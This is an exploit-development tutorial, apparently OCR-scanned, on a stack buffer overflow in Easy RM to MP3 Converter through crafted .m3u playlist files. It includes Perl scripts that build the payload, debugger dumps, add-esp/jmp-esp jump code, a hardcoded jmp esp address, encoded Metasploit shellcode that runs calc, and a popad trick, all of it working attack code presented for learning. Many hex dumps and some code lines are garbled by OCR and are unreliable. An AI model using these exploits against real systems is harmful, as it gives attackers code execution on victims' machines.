eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=00006715 eip=42424242 esp=000ff730 ebp=003440c0 iopl=0 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 nv up ei pl nz na pe nc efl=00000206 Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:000> d esp 000ff730 000ff740 000ff750 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXXXXX 000ff760 58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 XX..... 000ff770 $90 \hspace{0.1in} 90 \hspace$ 90 90 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 000ff780 000ff790 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff7a0 0:000> d 000ff7b0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff7c0 000ff7d0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff7e0 000ff7f0 000ff800 $90 \hspace{0.1in} 90 \hspace$ 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff810 000ff820 0:000> d000ff830 90 90 90 90 90 90 90 90 90-00 41 41 41 41 41 41 41 000ff840 000ff850 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff860 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff870 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ
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We can see our 50 X's at ESP. Let's pretend this is the only space available for shellcode (we think). However, when we look further down the stack, we can find back A's starting from address 000ff849 (=ESP+281).

When we look at other registers, there's no trace of X's or A's. (You can just dump the registers, or look for a number of A's in memory.

So this is it. We can jump to ESP to execute some code, but we only have 50 bytes to spend on shellcode. We also see other parts of our buffer at a lower position in the stack... in fact, when we continue to dump the contents of ESP, we have a huge buffer filled with A's...

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Self-commenter of							~~~	-101 200	·	_	_	_	_	_			
000ff7f0	50	90	50	90	50	90	50	90-90	90	90	90	50	90	50	90		
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000ff010	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90		
00011820	40	4ñ	40	4ñ	40	4ñ	40	90-90	46	90	46	֖.	46	֖.	46		
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00000000		**	**	**	**	**	1.4	40.00	4.6	1.4	4.6	1.4	**	-	**		
00011010	20	20	29	22	29	22	29	20-30	29	20	29	20	29	20	20		
00011840	20	90	20	90	20	90	30	90-00	41	41	41	41	41	41	41		
00011850	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	************	
000ff860	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	************	
000ff870	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
00011000	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	**************	
00011890	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ABABABABABABABABABA	
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000119P0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AIAIAIAIAIAIAIA	
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000ff8d0	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
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00011900	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	A3A3A3A3A3A3A3A3A3A3	
00011000	71	75	75	75	75	77	77	41 41	77	77	77	11	77	11	77	11111111111111111111	
00011930	-	22	-	22	77	22	77	41 41	22	77	22	77	22	77	22		
0.0011720	4.1	41	41		41	**	4.1	41-41	**	4.1	**	4.1	**	4.1		ATATATATATATATAT	
0:000> G																	
00011930	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AIAIAIAIAIAIAAA	
00011940	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	************	
02611000	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	*************	
03611000	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
00011970	4.1	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ABABABABABABABABABA	
00011300	21	11	11	11	11	11	11	41-41	11	11	11	11	11	11	25	1111111111111111111	
00011990	22	22	22	22	22	22	22	41-41	22	22	22	22	22	22	22	*************	
00011770	22	22	77	22	77	22	77		22	22	22	33	22	33	22	1111111111111111111111	
00011780	**	**	**	**	**	**	44	47-47	**	44	**	44	••	44	•••	ALALALALALALALAL	
0:0005 d																	
000113P0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AIAIAIAIAIAIAIA	
00011900	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	*************	
000ff9d0	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
000ff9e0	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	ABABABABABABABAB	
000ff9f0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	101010101010101010	
00011000	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	ABABABABABABABABABA	
00011+10		11	77	11	11	11	77	41-41	11	11	11	11	77	11		111111111111111111111	
00011010	77	22	72	22	72	22	72		22	72	22	72	22	77	22		
DUDITA20	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AIAIAIAIAIAIAIAIA	
D:000> d																	
00011930	41	41	41	41	41	43	41	41-41	43	41	41	41	41	41	41	AIAIAIAIAIAIAAA	
000ffa40	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	************	
00011a50	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
000ffa60	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	ABABABABABABABABA	
000ffa70	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	ABABABABABABABABA	
000ffa80	41	41	41	41	41	45	41	41-41	41	41	45	41	41	41	41		
00011-50	77	23	11	23	77	23	77	41 41	22	77	77	77	77	77	77		
00011870		22	22	22	22	22	22	11-11	22	22	22	22	22	22	22	111111111111111111111	
UNDITARU	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	*1	A#A#A#A#A#A#A#A#A#A#A#	
0.0002 9																	
0d611000	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	**************	
03611000	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	************	
000ffad0	41	41	41	41	41	41	41	41 - 41	41	41	41	41	41	41	41	*************	
000ffae0	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	A3A3A3A3A3A3A3A3A3A3	
000ffat0	41	÷1	41	21	41	21	41	41-41	11	41	11	41	11	41	41	**************	
00011000	11	22	11	22	11	22	11	11.11	11	11	11	77	22	77	71	A14141414141414141	
00012000	77	11	11	11	11	10	22	11.11	12	22	11	22	22	11	22	111111111111111111	
00011010	75	22	22	22	22	22	22	11-11	22	22	22	22	22	22	11	**************	
000112250	41	41	41	41	41	41	41	41-41	41	41	41	41	41	41	41	AIAIAIAIAIAIAIA	

Luckily there is a way to host the shellcode in the A's and use the X's to jump to the A's. In order to make this happen, we need a couple of things

• The position inside the buffer with 26094 A's that is now part of ESP, at 000ff849 ("Where do the A's shown in ESP really start ?) (so if we want to put our shellcode inside the

A's, we need to know where exactly it needs to be put)

• "Jumpcode" : code that will make the jump from the X's to the A's. This code cannot be larger than 50 bytes (because that's all we have available directly at ESP)

We can find the exact position by using guesswork, by using custom patterns, or by using one of metasploits patterns. We'll use one of metasploit's patterns... we'll start with a small one (so if we are looking at the start of the A's, then we would not have to work with large amount of character patterns :-))

Generate a pattern of let's say 1000 characters, and replace the first 1000 characters in the perl script with the pattern (and then add 25101 A's)

```
my $file= "test1.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa....g8Bg9Bh0Bh1Bh2B";
my $junk= "A" x 25101;
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available at ESP
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data in the ESP dump
open($FILE,">$file");
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";
eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=00006715
eip=42424242 esp=000ff730 ebp=003440c0 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
                                                                                                                                                           nv up ei pl nz na pe nc
                                                                                                                                                                                           efl=00000206
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
<Unloaded_P32.dll>+0x42424231:
42424242 ??
                                                                        ???
000ff750
                            58 58 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
000ff760
                                                                                                                                                                          XX.....
000ff770
                            . . . . . . . . . . . . . . . . .
000ff780
                            90 \hspace{0.1in} 90 \hspace
                                                                                                                                                                          . . . . . . . . . . . . . . . .
000ff790
                            . . . . . . . . . . . . . . . .
000ff7a0
                            0:000> d
000ff7b0
                            90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
                            000ff7c0
                                                                                                                                                                          . . . . . . . . . . . . . . . .
                            90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90
000ff7d0
                                                                                                                                                                          . . . . . . . . . . . . . . . . .
000ff7e0
                            90
                                    90 90 90 90 90 90
                                                                                         90-90 90 90 90 90 90 90 90
                                                                                                                                                                           . . . . . . . . . . . . . . . .
```

 $90 \hspace{0.1in} 90 \hspace$

 $90 \hspace{0.1in} 90 \hspace$

 $90 \hspace{0.1in} 90 \hspace$

 $90 \hspace{0.1in} 90 \hspace$

90 90 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90-00 35 41 69 36 41 69 37

41 69 38 41 69 39 41 6a-30 41 6a 31 41 6a 32 41 Ai8Ai9Aj0Aj1Aj2A

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.

.

.....5Ai6Ai7

000ff7f0

000ff800

000ff810

000ff820

0:000> d

000ff830

000ff840

000ff850

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 000ff860
 6a
 33
 41
 6a
 35-41
 6a
 36
 41
 6a
 37
 41
 6a
 j3Aj4Aj5Aj6Aj7Aj

 000ff870
 38
 41
 6a
 39
 41
 6b
 31
 41
 6b
 32
 41
 6a
 37
 41
 6a
 j3Aj4Aj5Aj6Aj7Aj

 000ff870
 38
 41
 6a
 39
 41
 6b
 31
 41
 6b
 32
 41
 6b
 33
 8Aj9Ak0Ak1Ak2Ak3

 000ff880
 41
 6b
 34
 41
 6c
 31
 41
 6c
 38
 41
 Ak4Ak5Ak6Ak7Ak8A

 000ff880
 6b
 39
 41
 6c
 31
 41
 6c
 34
 41
 6c
 <t

What we see at 000ff849 is definitely part of the pattern. The first 4 characters are 5Ai6

]		
	.17 22 23 23 24 23 24 25 25 25 25 24 25 25 25 25 25 25 25 25 25 25 25 25 25	
	54164 hj1Aj j6Aj7 lAk2A l2Al3 7A18A 12A13 18A19 Aj9Ak k4A10A h0An1 5An6A	
	44455 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 44445 4455 44555 44555 44555 44555 44555 44555 445555 445555 445555 44555555 4455555555	
	A18A19 33A344 8A3943 Ak4Ak5 k9A103 4A15A1 .5A163 0A3143 A36A37 k1Ak23 6Ak73 k1Ak23 2Am3Am A12A13 2Am3Am	
90 90	907 4633 463 635 463 463 463 463 463 463 463 463 463 463	
90 90	90 69 46 34 46 34 46 34 63 46 34 63 46 34 63 46 34 63 46 34 16 16 16 16 16 16 16 16 16 16 16 16 16	
90 90	90 4637 4633 41 341 341 341 341 341 341	
90 90	90 41 632 41 632 41 638 69 34 634 41 638 634 41 638 634 41 638 634 634 635 634 635 635 635 635 635 635 635 635	
90 90	90 59 31 41 57 41 637 637 637 637 637 637 637 637	
90 90	90 41 68 36 41 632 41 38 46 341 38 46 341 634 41 634 41 634	
90 90	90 35 41 60 37 69 33 41 60 37 69 341 60 37 63 31 60 37 63 33 41 60 37 63 37 63 33 41 60 37 60 37 60 37 60 37 60 37 60 37 60 37 60 37 60 37 60 37 60 37 60 57 60 60 60 60 60 60 60 60 60 60	
90-90 90-90	90-90 90-00 6a-30 35-41 41-6b 6b-36 6b-36 31-41 41-6c 37-41 41-6a 6a-38 33-41 41-6d 39-41 41-6d	
90 90	90 90 41 50 41 50 41 50 632 41 536 632 41 536 341 632 45 341 536 341 536 537 537 537 537 537 537 537 537 537 537	
90 90	90 90 46 35 46 34 6 34 6 34 6 34 6 34 6 34 6	
90 90	90 90 34 41 50 41 36 34 34 34 34 34 34 34 34 34 34 34 34 34	
90 90	90 90 46 39 41 63 5 63 14 63 7 46 37 46 33	
90 90	9008184108186618218	

Using metasploit pattern_offset utility, we see that these 4 characters are at offset 257. So instead of putting 26094 A's in the file, we'll put 257 A's, then our shellcode, and fill up the rest of the 26094 characters with A's again. Or even better, we'll start with only 250 A's, then 50 NOP's, then our shellcode, and then fill up the rest with A's. That way, we don't have to be very specific when jumping... If we can land in the NOP's before the shellcode, it will work just fine.

Let's see how the script and stack look like when we set this up :

```
my $file= "test1.m3u";
my $buffersize = 26094;
my $junk= "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofhuffer = "A" x (
```

my \$restofbuffer = "A" x (\$buffersize-(length(\$junk)+length(\$nop)+length(\$shellcode)));

```
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop2 = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
```

```
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
```

print "Size of buffer : ".length(\$buffer)."\n";

open(\$FILE,">\$file");
print \$FILE \$buffer.\$eip.\$preshellcode.\$nop2;
close(\$FILE);
print "m3u File Created successfully\n";

When the application dies, we can see our 50 NOPs starting at 000ff848, followed by the shellcode (0x90 at 000ff874), and then again followed by the A's. Ok, that looks fine.

<pre>(188.c98): Access violation - code c0000005 (!!! second chance !!!) eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=00006715 eip=42424242 esp=000ff730 ebp=003440c0 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data.</pre>																
Missing i	mag	e na	ame	, po	oss:	ible	e pa	aged - <mark>ol</mark>	ut (or (cori	rupt	t da	ata		
<unloaded< td=""><td>_P3</td><td>2.ď</td><td>11>-</td><td>+0x4</td><td>4242</td><td>2423</td><td>31:</td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td></unloaded<>	_P3	2.ď	11>-	+0x4	4242	2423	31:									
42424242	??					??	?									
0:000> d	esp	- 0		- 0	- 0	- 0	- 0	F0 F0	- 0		- 0	- 0	- 0	- 0	50	
00011/30	58	58	58	58	58	58	58	58-58	58	58	58	58	58	58	58	****
00011740	58	58	58	58	58	58	58	58-58	58	58	58	58	58	58	58	
00011750	20	20	20	20	20	20	20		20	20	20	20	20	20	20	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
00011700	20	00	90	90	90	90	90	90-90	90	90	90	90	90	90	90	^^
00011770 000ff780	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff700	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff7a0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
0:000> d																
000ff7b0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff7c0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff7d0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff7e0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff7f0	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff800	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
000ff810	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
00011820	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
0:000> d	00	~~	~~	~~	~~	~~	~~	00.00	~~	~~	~~	~~	~~	~~	~~	
00011830	90	90	90	90	90	90	90	90-90	90	90	90	90	90	90	90	
00011840	90	90	90	90	90	90	90	90-00	90	90	90	90	90	90	90	
00011850	90	90	90	90	90	00	90	90-90	90	90	00	90	90	90	00	
000ff870	90	90	90	90	00	41	41	41-41	41	41	41	41	41	41	41	ΔΔΔΔΔΔΔΔΔΔΔ
								· · · · · ·								

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The second thing we need to do is build our jumpcode that needs to be placed at ESP. The goal of the jumpcode is to jump to ESP+281

Writing jump code is as easy as writing down the required statements in assembly and then translating them to opcode (making sure that we don't have any null bytes or other restricted characters at the same time) :-)

Jumping to ESP+281 would require : Add 281 to the ESP register, and then perform jump esp. 281 = 119h. Don't try to add everything in one shot, or you may end up with opcode that contains null bytes.

Since we have some flexibility (due to the NOP's before our shellcode), we don't have to be very precise either. As long as we add 281 (or more), it will work. We have 50 bytes for our jumpcode, but that should not be a problem.

Let's add 0x5e (94) to esp, 3 times. Then do the jump to esp. The assembly commands are :

add esp,0x5e

 add esp,0x5e add esp,0x5e

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imp esp

. . . .

Using windbg, we can get the opcode :

0:014> d		
7c901211 add esp,0x5e		
add esp,0x5e		
7c901214 add esp,0x5e		
add esp,0x5e		
7c901217 add esp,0x5e		
add esp,0x5e		
7c90121a jmp esp		
jmp esp		
7c90121c		
0:014> u 7c901211		
<pre>ntdll!DbgBreakPoint+0x3:</pre>		
7c901211 83c45e	add	esp,5E
7c901214 83c45e	add	esp,5E
7c901217 83c45e	add	esp,5E
7c90121a ffe4	jmp	esp

Ok. so the opcode for the entire jumpcode is 0x83.0xc4.0x5e.0x83.0xc4.0x5e.0x83.0xc4.0x5e.0x85.0xc4.0x5e.0xff.0xe4

```
my $file= "test1.m3u"
my $buffersize = 26094;
my $junk= "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc"; #position 300
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBBB";
   $preshellcode = "X" x 4;
#add esp,0x5e
                                    #add esp,0x5e
    \x83\xc4\x5e"
                                    #add esp,0x5e
   "\xff\xe4";
                                    #imp esp
```

my \$nop2 = "0x90" x 10; # only used to visually separate

my \$buffer = \$junk.\$nop.\$shellcode.\$restofbuffer;

```
print "Size of buffer : ".length($buffer)."\n";
open($FILE.">$file"):
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
```

```
close($FILE);
print "m3u File Created successfully\n";
```

The jumpcode is perfectly placed at ESP. When the shellcode is called, ESP would point into the NOPs (between 00ff842 and 000ff873). Shellcode starts at 000ff874

(45c.f60): Access violation - code c0000005 (!!! second chance !!!) eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=00006608 eip=42424242 esp=000ff730 ebp=003440c0 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. <Unloaded_P32.dll>+0x42424231: 42424242 ?? ???

 0:000> d esp

 0000ff730
 83 c4 5e 83 c4 5e 83 c4-5e ff e4 00 01 00 00 00

 000ff740
 30 f7 0f 00 00 00 00 00 -41 41 41 41 41 41 41

 000ff740
 30 f7 0f 00 10 00 00 00 00 00 -41 41 41 41 41 41 41

 0.....AAAAAAAA 000ff760 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ

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000ff790 000ff7a0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 0:000> d 000ff7b0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff7c0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff7d0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff7e0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff7f0 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff800 AAAAAAAAAAAAAAAAAA 000ff810 ΔΔΔΔΔΔΔΔΔΔΔΔΔΔΔΔΔ 000ff820 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 0:000> d000ff830 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 41 41 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 000ff840 ΑΑ.... 000ff850 000ff860 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 90 ΑΑΑΑΑΑΑΑΑΑΑ 000ff870 000ff880 ΔΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff890 ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ

The last thing we need to do is overwrite EIP with a "jmp esp". From part 1 of the tutorial, we know that this can be achieved via address 0x01ccf23a What will happen when the overflow occurs ?

• Real shellcode will be placed in the first part of the string that is sent, and will end up at ESP+300. The real shellcode is prepended with NOP's to allow the jump to be off a little

· EIP will be overwritten with 0x01ccf23a (points to a dll, run "JMP ESP") • The data after overwriting EIP will be overwritten with jump code that adds 282 to ESP and then jumps to that address.

• After the payload is sent, EIP will jump to esp. This will triggger the jump code to jump to ESP+282. Nop sled, and shellcode gets executed.

Let's try with a break as real shellcode :

```
my $file= "test1.m3u"
    my $buffersize = 26094;
    my $junk= "A" x 250;
my $nop = "\x90" x 50;
    my $shellcode = "\xcc"; #position 300
    my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
    my $eip = pack('V',0x01ccf23a); #jmp esp from MSRMCcodec02.dll
    my $preshellcode = "X" x 4;
    #add esp,0x5e
                                         #add esp,0x5e
       "\x83\xc4\x5e"
                                         #add esp,0x5e
       "\xff\xe4";
                                         #jmp esp
    my $buffer = $junk.$nop.$shellcode.$restofbuffer;
    print "Size of buffer : ".length($buffer)."\n";
    open($FILE,">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
    close($FILE):
    print "m3u File Created successfully\n";
The generated m3u file will bring us right at our shellcode (which is a break). (EIP = 0x000ff874 = begin of shellcode )
```

(d5c.c64): Break instruction exception - code 80000003 (!!! second chance !!!) eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=00006608 eip=000ff874 esp=000ff84a ebp=003440c0 iopl=0 nv up ei pl nz ac po nc Cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 Missing image name, possible paged-out or corrupt data. efl=00000212 Missing image name, possible paged-out or corrupt data. <Unloaded_P32.dll>+0xff863: 000ff874 cc int 3 0:000> d esp 90 90 90 90 90 90 90 90 90-90 90 cc 41 41 41 41 41 000ff86a 000ff87a ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff88a ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff89a ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8aa ΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ 000ff8ba

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Replace the break with some real shellcode (and replace the A's with NOPs)... (shellcode : excluded characters 0x00, 0xff, 0xac, 0xca) When you replace the A's with NOPs, you'll have more space to jump into, so we can live with jumpcode that only jumps 188 positions further (2 times 5e)

my \$file= "test1.m3u" my \$buffersize = 26094;

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my \$junk= "\x90" x 200;

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```
my snop = " \times 90" \times 50;
```

windows/exec - 303 bytes # http://www.metasploit.com # Encoder: x86/alpha upper # ENCODE: .x00,01Fing_1; # EXITFUNC=seh, CMD=calc mv \$shellcode = "\x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49\ .x6\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x30\x41\x30\x30\x41" "\x42\x41\x41\x42\x54\x41\x51\x32\x41\x42\x32\x42\x42 '\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d' "\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47" "\x4c\x4c\x4b\x43\x4c\x44\x45\x54\x43\x31\x4a\x4f\x4c" "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a "\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46" "\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45" "\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c" "\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c $\x4b\x51\x4f\x51\x4d\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\$ '\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x39\x51\x4c\x46" "\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50" "\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" "\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44" "\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45" $\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b\$ "\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43" "\x51\x42\x4c\x45\x33\x45\x50\x41\x41";

my \$restofbuffer = "\x90" x (\$buffersize-(length(\$junk)+length(\$nop)+length(\$shellcode)));

my \$eip = pack('V',0x01ccf23a); #jmp esp from MSRMCcodec02.dll

my \$preshellcode = "X" x 4;

ny	jumpcode = "x83xc4x5e"	#add	esp,0x5e
	"\x83\xc4\x5e" .	#add	esp,0x5e
	"\xff\xe4";	#jmp	esp

my \$nop2 = "0×90" x 10; # only used to visually separate

my \$buffer = \$junk.\$nop.\$shellcode.\$restofbuffer;

print "Size of buffer : ".length(\$buffer)."\n";

open(\$FILE,">\$file");
print \$FILE \$buffer.\$eip.\$preshellcode.\$jumpcode;
close(\$FILE);
print "m3u File Created successfully\n";



pwned again :-)

Some other ways to jump

popadhardcode address to jump to

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the "**popap**" instruction may help us 'jumping' to our shellcode as well. popad (pop all double) will pop double words from the stack (ESP) into the general-purpose registers, in one action. The registers are loaded in the following order : EDI, ESI, EBP, EBX, EDX, ECX and EAX. As a result, the ESP register is incremented after each register is loaded (triggered by the popad). One popad will thus take 32 bytes from ESP and pops them in the registers in an orderly fashion. The popad opcode is 0x61

```
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```

Save the environment - don't print this document !

So suppose you need to jump 40 bytes, and you only have a couple of bytes to make the jump, you can issue 2 popad's to point ESP to the shellcode (which starts with NOPs to make up for the (2 times 32 bytes - 40 bytes of space that we need to jump over)) Let's use the Easy RM to MP3 vulnerability again to demonstrate this technique :

We'll reuse one of the script example from earlier in this post, and we'll build a fake buffer that will put 13 X's at ESP, then we'll pretend there is some garbage (D's and A's) and then place to put our shellcode (NOPS + A's)

my \$file= "test1.m3u" my \$buffersize = 26094;

my \$junk= "A" x 250; my \$nop = "\x90" x 50; my \$shellcode = "\xcc";

my \$restofbuffer = "A" x (\$buffersize-(length(\$junk)+length(\$nop)+length(\$shellcode)));

my \$eip = "BBBB"; my \$preshellcode = "X" x 17; #let's pretend this is the only space we have available my $garbage = 'x44' \times 100$; #let's pretend this is the space we need to jump over

my \$buffer = \$junk.\$nop.\$shellcode.\$restofbuffer;

print "Size of buffer : ".length(\$buffer)."\n";

open(\$FILE,">\$file");
print \$FILE \$buffer.\$eip.\$preshellcode.\$garbage; close(\$FILE); print "m3u File Created successfully\n";

After opening the file in Easy RM to MP3, the application dies, and ESP looks like this :

First cha	ance	exe	cept	tior	ns a	are	rep	ported	be	fore	e ar	ny e	exce	ept:	ion	handling.		
his exception may be expected and handled.																		
eax=00000	0001	eb	<=00	9104	4a58	3 e	cx=7	7c91005	5d (edx=	=003	3f00	900	es:	i=77	c5fce0_edi=0000666	b	
eip=42424	1242	esp	o=00	00f1	f730) el	op=0	003441	58 :	iop	l=0			1	ιν ι	ıp ei pl nz na pe n	C	
cs=001b	ss=(9023	3 0	ds=0	9023	3 6	es=0	9023 .	fs=(903I	bg	gs=0	9000	9		efl=0001020	5	
lissing i	Lmage	e na	ame,	, po	ossi	Lble	e pa	aged-ou	ut (or (cori	rup	t da	ata	•			
lissing i	Lmage	e na	ame,	, po	DSSI	Lble	e pa	aged-ou	ut (or (cori	rup	t da	ata	•			
lissing i	Lmage	e na	ame,	, po			e pa	agea-oi	ιτ (or	cori	rup	c aa	аτа	•			
 Unicoaded A2 42 42 42 	1_P34	2.0	11>1	F0X4	1242	2423	31:											
12424242	()					"	ſ											
000ff720	esp	БO	БO	БO	БO	БO	БO	EO EO	БŌ	БO	БŌ	БŌ	11	11	44		I	12 hytor
0011730	70	70	70	70	70	70	70	14 14	70	70	70	70	44	44	44		=-	> 15 Dyles
0011740	44	44	44	44	44	44	44	44-44 AA AA	44	44	44	44	44	44	44	000000000000000000000000000000000000000	_~	/ yai baye
0011750	44	44	44	44	44	44	44	44-44 AA AA	44	44	44	44	44	44	44	000000000000000000000000000000000000000		garbage
0011700	44	44	44	44	44	44	44	44-44	44	44	44	44	44	44	44	ממממממממממממממממ		garbage
0011770	44	44	44	44	44	44	44	44 - 44	44	44	44	44	44	44	44	000000000000000000000000000000000000000	=>	garbage
0011700	44	44	44	44	44	44	44	44 - 44	44	44	44	44	44	44	44	000000000000000000000000000000000000000	=>	garbage
